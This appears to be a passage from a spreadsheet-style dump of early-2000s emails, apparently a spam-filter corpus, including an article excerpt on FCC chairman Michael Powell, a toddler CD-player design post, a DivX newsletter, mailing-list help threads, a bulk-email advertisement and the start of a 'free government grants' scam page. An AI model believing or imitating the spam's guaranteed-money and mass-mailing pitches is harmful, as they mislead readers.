 &gt; seeleck a key to the room where it's kept, so the see-leck asks the 
 &gt; F.C.C. to rule that the arbock has to give it the key.
 &gt; 
 &gt; Partly because Hundt assured the see-lecks and other new companies that 
 &gt; he would protect them, and partly because of the generally booming 
 &gt; condition of the economy then, investment capital flooded into the 
 &gt; see-leckscompanies with names like Winstar, Covad, and Teligentand 
 &gt; into other telecommunications companies. Even not obviously related 
 &gt; technology companies like Cisco Systems benefitted from the telecom 
 &gt; boom: demand for their products was supposed to come from the see-lecks 
 &gt; and other new players. There would be no conflict between the interests 
 &gt; of the new telecom companies and those of consumers; as one of Hundt's 
 &gt; former lieutenants told me, "Reed used to joke that my job was to make 
 &gt; sure that all prices went down and all stocks went up."
 &gt; 
 &gt; 
 &gt; The years following the passage of the Telecom Act were the peak of the 
 &gt; boom. Wall Street had its blood up, and that meant not just more 
 &gt; startups but also more mergers of existing communications companies: 
 &gt; Time Warner and AOL decided to throw in together, and A.T. &amp; T. and 
 &gt; Comcast, and so on. (Surely, WorldCom and the other telecom bad guys 
 &gt; believed that their self-dealing, stock-overselling, and creative 
 &gt; accounting would go unnoticed because the market was so undiscriminating.)
 &gt; 
 &gt; By the time the outcome of the 2000 Presidential election had been 
 &gt; determined, the telecom crash was well under way. Nonetheless, the 
 &gt; chairmanship of the F.C.C. remained one of the best jobs, in terms of 
 &gt; influence and visibility, available to a career government regulator. 
 &gt; Three Republicans emerged as candidates: Powell, who was a commissioner; 
 &gt; Harold Furchtgott-Roth, the farthest-to-the-right commissioner; and 
 &gt; Patrick Wood, the head of the Texas Public Utility Commission and, as 
 &gt; such, a George W. Bush guy. In Texas, however, Wood had crossed the most 
 &gt; powerful person in the arbock camp, Edward Whitacre, the C.E.O. of 
 &gt; S.B.C. Communications, which is headquartered in San Antonio. This meant 
 &gt; that the arbocks didn't want Wood as head of the F.C.C., because he 
 &gt; might be too pro-see-leck. (Wood is now the head of the Federal Energy 
 &gt; Regulatory Commission.) Michael Powell had to signal the arbocks that he 
 &gt; wasn't as threatening as Wood, while also signalling the conservative 
 &gt; movement that he was only negligibly farther to the left than 
 &gt; Furchtgott-Roth.
 &gt; 
 &gt; Powell did this deftly. For example, in December of 2000 he appeared 
 &gt; before a conservative group called the Progress &amp; Freedom Foundation and 
 &gt; gave a very Michael Powell speechwhimsical, intellectual, and 
 &gt; free-associative (Biblical history, Joseph Schumpeter, Moore's Law)that 
 &gt; began by making fun of the idea that the F.C.C. should try to keep new 
 &gt; telecom companies alive. "In the wake of the 1996 Act, the F.C.C. is 
 &gt; often cast as the Grinch who stole Christmas," Powell said. "Like the 
 &gt; Whos, down in Who-ville, who feast on Who-pudding and rare Who-roast 
 &gt; beast, the communications industry was preparing to feast on the 
 &gt; deregulatory fruits it believed would inevitably sprout from the Act's 
 &gt; fertile soil. But this feast the F.C.C. Grinch did not like in the 
 &gt; least, so it is thought." Thus Powell was indicating that if he became 
 &gt; chairman he didn't expect to administer first aid to the see-lecks as 
 &gt; part of the job. He was appointed to the chairmanship on the first day 
 &gt; of the Bush Administration.
 &gt; 
 &gt; Twenty months into the Administration, nearly all the see-lecks are dead 
 &gt; or dying; nearly all long-distance companies, not just WorldCom, are in 
 &gt; serious trouble; cable companies have lost half their value; satellite 
 &gt; companies are staggering. The crash has had an automatically 
 &gt; concentrating effect, because as new companies die the existing 
 &gt; companies' market share increases, and, if the existing companies are in 
 &gt; good shape financially, they have the opportunity to pick up damaged 
 &gt; companies at bargain prices. During the Bush Administration, as the 
 &gt; financial carnage in communications has worsened, the communications 
 &gt; industry has moved in the direction of more concentration. If the Bells 
 &gt; wind up protecting their regional monopolies in local phone service, and 
 &gt; if they also merge, the country will be on its way to having a national 
 &gt; duopoly in local service: Verizon, in the East, and S.B.C., in the West. 
 &gt; And these companies could dominate long distance as well, because of the 
 &gt; poor health of the long-distance companies.
 &gt; 
 &gt; The cable business also seems close to having two dominant national 
 &gt; companies, AOL Time Warner and Comcast. Unlike the phone companies, they 
 &gt; don't have to share their wiring with other companies and so can more 
 &gt; fully control what material they allow to enter people's homes. As part 
 &gt; of the complicated bargaining with interest groups that led to the 1996 
 &gt; Telecom Act, the limits on concentration in the radio industry were 
 &gt; significantly loosened, and in the past six years the number of 
 &gt; radio-station owners in the United States has been cut by twenty-five 
 &gt; per cent; today, a large portion of local and national radio news 
 &gt; programming is supplied by a single company, Westwood One, a subsidiary 
 &gt; of Viacom.
 &gt; 
 &gt; In this situation, many Democrats and liberals think, the F.C.C. should 
 &gt; be hyperactivethe superhero of government regulation, springing to the 
 &gt; rescue of both consumers and the communications industry. It should try 
 &gt; to breathe life into the see-lecks and other new companies. It should 
 &gt; disallow mergers, maintain ownership limits, and otherwise restrain the 
 &gt; forces of concentration. It should use the government's money and muscle 
 &gt; to get new technologyespecially fast Internet connectionsinto the 
 &gt; homes of people who can't afford it at current market prices. (An 
 &gt; analogy that a lot of people in F.C.C. World make is between telecom and 
 &gt; the Middle East: the Clinton people blame the bloodshed on the Bush 
 &gt; people, because they disengaged when they came into office, and the Bush 
 &gt; people blame it on the Clinton people, because they raised too many 
 &gt; expectations and stirred too many passions.)
 &gt; 
 &gt; But Michael Powell's F.C.C. has not been hyperactive. Powell has been 
 &gt; conducting internal policy reviews and reforming the management of the 
 &gt; F.C.C. and waiting for the federal courts and the Congress to send him 
 &gt; signals. (In mid-September, Powell finally initiated a formal review of 
 &gt; the F.C.C.'s limits on media concentration.) This doesn't mean he has 
 &gt; been inactive; rather, he has been active in a way that further 
 &gt; infuriates his criticsin a manner that smoothly blends the genial and 
 &gt; the provocative, he muses about whether the fundamental premises of 
 &gt; F.C.C. World really make sense, while giving the impression that he's 
 &gt; having the time of his life as chairman. At his first press conference, 
 &gt; when he was asked what he was going to do about the "digital 
 &gt; divide"that is, economic inequality in access to the Internethe said, 
 &gt; "You know, I think there is a Mercedes divide. I'd like to have one and 
 &gt; I can't afford one." At the National Cable &amp; Telecommunications 
 &gt; Association convention, in Chicago, Powell, following a troupe of 
 &gt; tumblers to the stage, interrupted his walk to the podium to perform a 
 &gt; somersault.
 &gt; 
 &gt; 
 &gt; Not long ago, I went to see Powell in his office at the F.C.C. Until 
 &gt; 1998, when the commission moved to a new building in Southwest 
 &gt; Washington, near the city's open-air fish market, F.C.C. World was at 
 &gt; the western edge of downtown, where everybody would encounter everybody 
 &gt; else at a few familiar restaurants and bars. Today, the F.C.C. building 
 &gt; looks like the office of a mortgage company in a suburban office park. 
 &gt; Even the chairman's suite, though large, is beige, carpeted, and 
 &gt; fluorescent. Powell is a bulky man who wears gold-rimmed glasses and 
 &gt; walks with a pronounced limp, the result of injuries he suffered in a 
 &gt; jeep accident in Germany, in 1987, when he was an Army officer. Because 
 &gt; of the accident, he left the Army and went to law school, where he 
 &gt; became entranced with conservative ideas about regulation, particularly 
 &gt; the idea that the government, rather than trying to correct the flaws of 
 &gt; the market before the fact"prophylactically," as he likes to sayshould 
 &gt; wait till the flaws manifest themselves and then use antitrust 
 &gt; litigation to fix them. He worked briefly at a corporate law firm, and 
 &gt; then became a protg of Joel Klein, the head of the antitrust division 
 &gt; of the Clinton Justice Department and the man who led the government's 
 &gt; legal case against Microsoft. (He was recently appointed chancellor of 
 &gt; the New York public-school system.) It testifies to Powell's political 
 &gt; skill that he is probably the only high official in the Bush 
 &gt; Administration who not only served in the Clinton Administration but 
 &gt; also maintains close ties to Bush's nemesis Senator John McCain, of 
 &gt; Arizona. One of the things about Powell that annoy people is his 
 &gt; enduring love of law school"It's sort of like a law-school study 
 &gt; session over there," one Democratic former commissioner said. As if to 
 &gt; confirm the charge, Powell, when I arrived, introduced me to four law 
 &gt; students, summer interns at the commission, whom he'd invited to sit in.
 &gt; 
 &gt; I began by asking Powell whether he agreed with the founding assumptions 
 &gt; of the F.C.C. For example, could private companies have apportioned the 
 &gt; airwaves among themselves without the government being involved?
 &gt; 
 &gt; "I think we'll never know," Powell said. "I don't think it's an 
 &gt; automatically bad idea, the way some people will argue. Land is probably 
 &gt; the best analogue. We don't seize all the land in the United States and 
 &gt; say, 'The government will issue licenses to use land.' If my neighbor 
 &gt; puts a fence one foot onto my property line, there's a whole body of law 
 &gt; about what I can do about that, including whether I can tear it down. If 
 &gt; a wireless company was interfering with another wireless company, it's a 
 &gt; similar proposition. There are scholars who argueindeed, the famous 
 &gt; Ronald Coase treatise that won the Nobel Prize was about thisthat 
 &gt; spectrum policy is lunacy. The market could work this out, in the kinds 
 &gt; of ways that we're accustomed to."
 &gt; 
 &gt; Talking to Powell was fun. Unlike most high government officials, he 
 &gt; doesn't seem to be invested in appearing dignified or commanding. He 
 &gt; slumps in his chair and fiddles with his tie and riffs. He speaks in 
 &gt; ironic air quotes. He's like your libertarian friend in college who 
 &gt; enjoyed staying up all night asking impertinent rhetorical questions 
 &gt; about aspects of life that everybody else takes for granted but that he 
 &gt; sees as sentimental or illogical. After a while, I asked him whether he 
 &gt; thought his predecessors' excitement about the 1996 Telecommunications 
 &gt; Act had been excessive.
 &gt; 
 &gt; "I would start with a caveat," Powell said. "Look, I can't fault those 
 &gt; judgments in and of themselves, given the time and what people thought. 
 &gt; They were not the only ones who were hysterical about the opportunities. 
 &gt; But, frankly, I've always been a little bit critical. First of all, 
 &gt; anybody who works with the act knows that it doesn't come anywhere close 
 &gt; to matching the hyperbole that was associated with it, by the President 
 &gt; on down, about the kinds of things it's going to open up. I mean, I 
 &gt; don't know what provisions are the information-superhighway provisions, 
 &gt; or what provisions are so digitally oriented, or some of the things that 
 &gt; were a big part of the theatre of its introduction. When one starts 
 &gt; reading the details, one searches, often in vain, for these provisions. 
 &gt; But, nonetheless, there was a rising dot-com excitement, and an Internet 
 &gt; excitement, and people thought this was historic legislation, and it 
 &gt; certainly was.
 &gt; 
 &gt; "But. We were sucking helium out of balloons, with the kinds of 
 &gt; expectations that were being bandied around, and this is before the 
 &gt; economy or the market even gets in trouble. It was a dramatically 
 &gt; exaggerated expectationby the leadership of the commission, by 
 &gt; politicians, by the market itself, by companies themselves. It was a 
 &gt; gold rush, and led to some very detrimental business decisions, ones 
 &gt; that government encouraged by its policies, frankly. Everybody wanted to 
 &gt; see numbers go up on the board."
 &gt; 
 &gt; Powell began imitating an imagined true believer in the Telecom Act. " 
 &gt; 'I want to see ten competitors. Twenty competitors! I want to see 
 &gt; thirty-per-cent market share. Fifty-per-cent market share! I want the 
 &gt; Bells to bleed! Then we'll know we've succeeded.' " Now Powell returned 
 &gt; to being Powell. "I think that expectation was astonishingly 
 &gt; unrealistic, in the short term. They wanted to see it while they're 
 &gt; there. We were starting to get drunk on the juice we were drinking. And 
 &gt; the market was getting drunk on the juice we were drinking. There's no 
 &gt; question, we went too soon too fast. Too many companies took on too much 
 &gt; debt too fast before the market really had a product, or a business model."
 &gt; 
 &gt; How could the Telecom Act have been handled better? "We could have 
 &gt; chosen policies that were less hellbent on a single objective, and were 
 &gt; slightly more balanced and put more economic discipline in the system," 
 &gt; Powell said. "Money chased what seemed like government-promised 
 &gt; opportunity. The problem with that is there's a morning after, and we're 
 &gt; in it. And the problem is there is no short fix for this problem. This 
 &gt; debt is going to take years to bring down to a realistic level. In some 
 &gt; ways, for short-term gain, we paid a price in long-term stability."
 &gt; 
 &gt; Powell went on to say that it might have turned out differently if there 
 &gt; had been a more "reasonable" level of investment. "No, we wouldn't have 
 &gt; every home in America with competitive choice yetbut we don't anyway. I 
 &gt; don't think it's the remonopolization of telephone service. I don't buy 
 &gt; that. The Bells will prosper, but did anybody believe they wouldn't? The 
 &gt; part of the story that didn't materialize was that people thought so 
 &gt; would MCI WorldCom and Sprint."
 &gt; 
 &gt; Other local phone companies, he added, hadn't materialized as viable 
 &gt; businesses, either, and they never might. "Everybody's always saying, 
 &gt; 'The regulators did this and this and this.' But, candidly, the story's 
 &gt; quite the opposite. I think the regulators bent over backward for six 
 &gt; years to give them a chance. Conditions don't get that good except once 
 &gt; every thirty years, and it didn't happen. So, whatever the reason, we're 
 &gt; looking at a WorldCom that's teetering. We're looking at a long-distance 
 &gt; business that has had a rapid decline in its revenue base. A.T. &amp; T. is 
 &gt; breaking itself up. Sprint has struggled."
 &gt; 
 &gt; Could the F.C.C. have done anything to make the long-distance companies 
 &gt; stronger? "At the F.C.C.? I think I'll just be blunt. My political 
 &gt; answer? Yes, there's all kinds of things we can do at the margin to try 
 &gt; to help. But I can't find thirty billion dollars for WorldCom somewhere. 
 &gt; I can't mitigate the impacts of an accounting scandal and an S.E.C. 
 &gt; investigation. Were I king, it would be wonderful, but I don't have 
 &gt; those kinds of levers. I don't know whether anybody does. At some point, 
 &gt; companies are expected to run themselves in a way that keeps them from 
 &gt; dying." Powell couldn't have made it much clearer that he doesn't think 
 &gt; it's his responsibility to do anything about the telecom crash. He has 
 &gt; demonstrated his sure political touch by making accommodationist 
 &gt; gesturesin August, for example, five months after disbanding the 
 &gt; F.C.C.'s Accounting Safeguards Division, Powell announced that he was 
 &gt; appointing a committee to study accounting standards in the 
 &gt; communications industry. But that shows that Powell is better at riding 
 &gt; out the storm than, say, Harvey Pitt, his counterpart at the Securities 
 &gt; and Exchange Commission, and does not mean that he plans to try to shore 
 &gt; up the telecom industry.
 &gt; 
 &gt; I asked Powell if it would bother him if, for most people, only one 
 &gt; company provided cable television and only one provided local phone 
 &gt; service. "Yes," he said. "It concerns us that there's one of each of 
 &gt; those things, but let's not diminish the importance of there being one 
 &gt; of each of those things. That still is a nice suite of communications 
 &gt; capabilities, even if they aren't direct analogues of each other." 
 &gt; Anyway, Powell said, before long the phone companies will be able to 
 &gt; provide video service over their lines, and the cable companies will 
 &gt; provide data service over their lines, so there will be more choice. 
 &gt; "So, yeah, we have this anxiety: we have one of everything. The question 
 &gt; is, Does it stay that way?"
 &gt; 
 &gt; The concentration of ownership and the concentrated control of 
 &gt; information did not appear to trouble Powell, either. He said that 
 &gt; people confuse bigness, which brings many benefits, with concentration, 
 &gt; which distorts markets. "If this were just economics, it's easy. If you 
 &gt; were to say to me, 'Mike, just worry about economic concentration,' we 
 &gt; know how to do thatthe econometrics of antitrust. I can tell you when a 
 &gt; market's too concentrated and prices are going to rise. The problem is 
 &gt; other dimensions, like political, ideological, sometimes emotional. Take 
 &gt; the question of, if everybody's controlling what you see, the assumption 
 &gt; there is that somehow there'll be this viewpoint, a monolithic 
 &gt; viewpoint, pushed on you by your media and you won't get diversity. I 
 &gt; think that's a possibility. I don't think it's nearly the possibility 
 &gt; that's ascribed to it sometimes."
 &gt; 
 &gt; Powell explained, "Sometimes when we see very pointed political or 
 &gt; parochial programming, it gets attacked as unfair. I see some of the 
 &gt; same people who claim they want diversity go crazy when Rush Limbaugh 
 &gt; exists. They love diversity, but somehow we should run Howard Stern off 
 &gt; the planet. If it has a point of view, then it becomes accused of bias, 
 &gt; and then we have policies like"here his tone went from ironic to 
 &gt; sarcastic"the fairness doctrine, which seems to me like the antithesis 
 &gt; of what I thought those people cared about. So when somebody is pointed 
 &gt; and opinionated, we do all this stuff in the name of journalistic 
 &gt; fairness and integrity or whatever, to make them balance it out."
 &gt; 
 &gt; 
 &gt; F.C.C. World abounds in theories about Michael Powell. One is that he 
 &gt; can't make up his mind about how to address the crisis in the industries 
 &gt; he regulatesso he talks (and talks and talks) flamboyantly about the 
 &gt; market, in order to buy himself time. Another is that he's carrying 
 &gt; water for the arbocks and the big cable companies. Another is that he is 
 &gt; planning to run for the Senate from Virginia (or to be appointed 
 &gt; Attorney General in a second Bush term), and doesn't want to do anything 
 &gt; at the F.C.C. that would diminish his chances. Another is that he's 
 &gt; waiting to move until there is more consensus on some course of action, 
 &gt; so that he doesn't wind up going first and getting caught in the 
 &gt; crossfire between the arbocks and the cable companies and the television 
 &gt; networks. (In F.C.C. World, this is known as the Powell Doctrine of 
 &gt; Telecom, after Colin Powell's idea that the United States should never 
 &gt; commit itself militarily without a clear objective, overwhelming force, 
 &gt; and an exit strategy.) And another is that he actually believes what he 
 &gt; says, and thinks the telecommunications crash is natural, healthy, and 
 &gt; irreversible, and more concentration would be just fine.
 &gt; 
 &gt; "This is why elections matter," Reed Hundt, who isn't happy about what 
 &gt; has become of his Telecom Act, told me. It's true that the F.C.C.much 
 &gt; more than, say, the war in Afghanistanis a case in which a Gore 
 &gt; Administration would be acting quite differently from the Bush 
 &gt; Administration. Consumers might have noticed the difference by now, but 
 &gt; there's no question whether communications companies have noticed. The 
 &gt; arbocks are doing better against their internal rivals than they would 
 &gt; have done if Gore had won. Next election, they'll help the party that 
 &gt; helped them. If the Republicans win, policy will tilt further in the 
 &gt; arbocks' favor. If they lose, perhaps the arbocks' rivalsthe 
 &gt; long-distance companies and the telecommunications upstartswith their 
 &gt; friends now in power, will stage a comeback. America's present is not 
 &gt; unrecognizably different from America's past.
 &gt; 
 &gt; 
 -- 
 Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
 gbolcer at endeavors.com  | http://endeavors.com
 Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CD player UI for toddlers
</t>
  </si>
  <si>
    <t xml:space="preserve">So, like many young children, my daughter Tatum (age 21 months) *really*
 likes music. She also likes to have control over her environment, and this
 means she wants to be the one putting CDs into the CD player, and getting
 the music playing.
 By watching Tatum, I've discovered that you can learn a lot about UI design
 from watching 21-month-olds use technology. There is definitely a market
 niche for a toddler-friendly CD/MP3 player.
 The CD player we have combines play and pause in a single button, but
 doesn't provide *instantaneous* feedback that the button was pushed, instead
 requiring you to wait until the music starts, 5-10 seconds. This is a UI
 disaster. Since Tatum doesn't get feedback right away, she presses the
 button again, thereby pausing the CD before it even plays. She'll only ever
 get music if she presses the button an odd number of times. This happens a
 surprising amount of the time, since she eventually hits the button again
 when the music doesn't play.
 For toddlers, pressing play must cause the music to start immediately,
 within half a second, for the toddler to get the causality and not press the
 button multiple times. As well, pressing the button multiple times shouldn't
 change the semantics, like an elevator button. No matter how many times you
 press, the elevator still comes to that floor. The play button needs to be
 the same.
 The back-hinged door mechanism feeding the CD into the player is also a UI
 disaster for Tatum. Since the door hinges on the back, Tatum has to angle
 CDs to put them in, and take them out. Putting CDs in isn't much of a
 problem, but taking them out is. Since Tatum grabs CDs by the back edge,
 that edge comes out first, hitting the lid. Tatum eventually forces and
 wiggles the CD out, a process that's hard on the CD and the player (but
 which hasn't yet resulted in the CD player being broken). Surprisingly, it
 hasn't been a problem getting the CD hole onto the spindle -- Tatum seems to
 understand this concept, and the CD load area geometry naturally guides the
 CD.
 Tatum's CD player also plays tapes and has FM radio. For a toddler, this is
 a mistake. Tatum doesn't understand the need to flick a switch to put the
 player into a specific mode. She understands putting a CD in, and pressing
 the play button. She sometimes understands the buttons for advancing a song,
 but uses them erratically. As well, the radio feature has both FM mono and
 FM stero, a distinction totally lost on Tatum. Tatum only understands the
 binary distinction of music/no music.
 What would the ideal toddler CD player be like? It would immediately start
 playing a CD after it was loaded. As soon as the CD load door was closed, it
 would give some audible feedback. It would have a single large play button.
 The other typical CD controls would be larger than normal, but at least half
 the size of the play button, and located far away from the play button, so
 there is no chance of them getting accidentally pressed on the way to play.
 The play button would be a bright color that is different from the color of
 the player, and different from the color of the other CD control keys. The
 device would only play CDs, no other functions. The CD load area would flip
 open at least 80 degrees. It should be small, approachable for a toddler. It
 should be possible to repeatedly drop the player from a height of 1-2'
 without affecting the player.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DivX News: DivX Affiliate Program, Nobody in DivX, and New Player
</t>
  </si>
  <si>
    <t xml:space="preserve">DivX News (Number 21, 2002-07-26)
 =================================
 What's Hot in the World of DivX(tm) Video This Week:
 DivX Affiliate Program, Nobody in DivX, and New Player Skins
 Now Sent to Over 1.6 Million DivX Fans Worldwide!
   Welcome to this week's edition of DivX News, your weekly fix of
   information about what's hot and what's cool in the world of
   DivX video.
   (You are being sent this email because you subscribed to this
   newsletter at DivX.com. If you'd like to unsubscribe, follow
   the instructions at the end of this message.)
   In This Week's Issue
   --------------------
   1. Sell DivX Pro From Your Web Site
   2. Japanese Crime Noir in DivX Video
   3. Mad Phat Crazy Skins
   Sell DivX Pro From Your Web Site
   -------------------------------
   DivX has become the world's most popular video technology and
   garnered millions of loyal fans thanks almost entirely to
   word-of-mouth buzz from users like you. We've always known that
   DivX users are the generous sort--the kind of people who want to
   share great-looking video technology with the rest of the world.
   But what if you could exercise your generous nature by spreading
   the DivX gospel while making money at the same time?
   Now you can. The DivX Affiliate Program allows web site owners to
   make money while providing users with the best video technology on
   the Internet. If you have your own web site, all you have to do is
   sign up to become an authorized DivX Pro Affiliate. Once you're
   approved, you simply add a DivX download link to your Web site
   and, voila, you're in business. Every time someone clicks on your
   link to DivX.com and purchases DivX Pro, you'll earn a percentage
   of the sale.
 * Read More About the DivX Pro Affiliate Program on DivX.com:
   &lt;http://rd.mailshell.com/www.divx.com/affiliate/&gt;
  %------------------ADVERTISEMENT------------------%
   PRE-ORDER THE LORD OF THE RINGS: THE FELLOWSHIP OF THE RING
   Pre-order The Lord of the Rings DVD. Two hours of extra content
   and a ten-minute behind the scenes look at The Two Towers. Click
   to buy!
   &lt;http://rd.mailshell.com/www.qksrv.net/click-1153836-8224557&gt;
   %------------------ADVERTISEMENT------------------%
   Japanese Crime Noir in DivX Video
   ---------------------------------
   A wide variety of innovative studios and film distributors have
   been using DivX video-on-demand technology to sell downloadable
   DivX titles online since August of last year. One of the many
   interesting films currently available is the Japanese crime
   thriller "Nobody" from DivX partner Vanguard Cinema. Called "a
   triumph" by the New York Times, "Nobody" is an action-packed
   thriller-noir that tells a story of an escalating cycle of
   violence and revenge. In the tradition of international crime
   thrillers like "La Femme Nikita" and "Tokyo Fist," "Nobody" takes
   the viewer through a labyrinth of suspense and carnage without
   release until the very end.
 * Watch "Nobody" in High-quality DivX Video:
   &lt;http://rd.mailshell.com/www.divx.com/showcase&gt;
   Mad Phat Crazy DivX Player Skins
   ---------------------------------
   The week's dopest DivX Player Skins:
 * DivX 4 Real: Puts an interesting DivX spin on a familiar player
   design--keeping it real. Submitted by "DIVX Budman."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=77&gt;
 * More DivX: Who doesn't want more DivX? A very colorful, very
   circular design submitted by one of our old favorite skin authors:
   "JC."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=76&gt;
 * Luxury: Live the good life with this high-class, luxurious gold
   skin. Submitted by "scoj."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=75&gt;
   For all the new skins, check out the DivX Skins section:
   &lt;http://rd.mailshell.com/www.divx.com/skins&gt;. If you'd like to make your own skin,
   read the "How to Create a Skin" page:
   &lt;http://rd.mailshell.com/www.divx.com/skins/create.php&gt;.
   That's all we have for you this week. Thanks for supporting DivX
   video. Please feel free to send us any comments and suggestions
   at &lt;info@divx.com&gt;.
   Until next time,
   The DivX Team
   P.S. If you have friends that you think would enjoy receiving
   this newsletter, please forward this message on to them.
 --
 Copyright(c) 2002 DivXNetworks, Inc. All rights reserved.
 DivX is a trademark of DivXNetworks, Inc.
 &lt;http://rd.mailshell.com/www.divx.com&gt;
 &lt;http://rd.mailshell.com/www.divxnetworks.com&gt;
 This newsletter is sent weekly to over 1,600,000 opt-in subscribers.
 If you are interested in advertising in the DivX News, write us at
 &lt;advertising@divxnetworks.com&gt;.
 This newsletter is sent from an automated account. Replies to this
 message will not be read. Please follow the unsubscribe
 instructions below if you do not want to receive this newsletter
 in the future.
 If you do not wish to receive future newsletters, you can
 unsubscribe by visiting &lt;http://rd.mailshell.com/www.divx.com/list/unsubscribe.php&gt;
 and entering your email address. Alternately, you can send an
 email message to &lt;divx-unsubscribe@lists.divx.com&gt; and be removed
 from the list.
 ---------- Your email is protected by Mailshell ---------- 
 As you requested, this email was forwarded to you by Mailshell.
 Mailshell will forward your replies to this email and keep your
 private email address safe.
 To unsubscribe safely and easily using Mailshell or to stop forwarding:
 http://www.mailshell.com/control.html?a=b_fa37eeq98z1xl2zjr74cp11v559ad52admz
 ReturnPath.net http://rd.mailshell.com/ad481
 Earn up to $3 for each of your friends who signs up with Mailshell! http://rd.mailshell.com/sp5
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] "Broken Pipe" on initial test
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
 I've just installed SpamAssassin and relevant modules.
 Just tried the initial test: 
 spamassassin -t &lt; sample-nonspam.txt &gt; nonspam.out
 and got back:
 Broken Pipe
 I've also tried using the -P and --pipe option but to
 no avail.
 Any help greatly appreciated. BTW - I'm no great Perl
 expert!
 rgds
 Peter
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com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</si>
  <si>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Spray a bit of wd40 around the screw, and leave for a few minutes
 Try using a small crocodile-nosed pliers if you have enough space around
 th head of the screw. If not, try a hacksaw blade on the shaft of the
 screw under the board (taking care not to scratch the underside of the
 board. after cutting the screw, that holder on the board support structure
 cannot really be used again.
 Another method is to get a small screwdriver that you can consider
 disposable, and gently tap it into the head of the stripped screw, until
 you either have a flat head screw, or you can get enough turning force
  on it.
 Cathal.
 On Wed, 21 Aug 2002, Kiall Mac Innes wrote:
 &gt; Hi i have a phillips head skrew thats holding a circut board together i need
 &gt; to take it out ASAP and nothing will work, the threads on the skrew are
 &gt; almost completly gone, its is a very small skrew that i have to use a
 &gt; percision skrewdriver set to remove the skrews any help would be
 &gt; appreaciated...
 &gt;
 &gt; Kiall Mac Innes
 &gt;
 &gt;
 &gt;
 -- 
 Cathal Ferris.			pio@skynet.ie
 +353 87 9852077			www.csn.ul.ie/~pio
 ---
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Need Sales &amp; Leads we Can Help 1000 leads to 10 leads !!!!             27896
</t>
  </si>
  <si>
    <t xml:space="preserve">We offer some of the best bulk e-mail prices on the Internet.  
 Bulk e-mail can get you the best exposure on the net. What makes 
 this kind of advertising so effective is the fact that you go to the 
 potential customer. Not like search engines or print ads that the 
 potential customer has to do all the searching.  Dollar for dollar 
 bulk e-mailing is also the most economical.  We do all the mailing for 
 you. You just provide us with the ad!  It's that simple!
 What we offer:
 STANDARD PRICING: (Emails Delivered)
 GENERAL MAILING        
 250,000 - $200.00 _____  
 500,000 - $300.00 ______ 
 1,000,000 - $400.00  _____ 
 WE ALSO HAVE LARGER PACKAGES!
 24/7 Bulk Mailing Service has opening for one new customer..
 Your message emailed to millions and millions every day non stop 7 days a week.
 Average between 3-5 million per day depending on message size etc.
 You will receive more leads and business than you ever imagined.
 Price is $2500.00 per week.Other bulk mailers charge from $500-$750 or 
 more per each million emails sent.With our 24/7 plan, you only pay for 
 the first 5 million, and the remaining 15-30 million are Free.
 We only have one opening available, so respond now if you are 
 interested.
 IF YOU PLACE AN ORDER WITHIN 48 hours YOU GET 200,000 FREE E-MAILS 
 SENT!  
 Call for bigger packages!  ORDER NOW!!! AND GET THE RIGHT EXPOSURE!
 So why not give us a call and see what it is that we can do for you.  
 call anytime 308-650-5905.
 Do not reply to this message - 
 To be off from future mailings:
 mailto:trudymail2002@themail.com?Subject=nomore4me
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
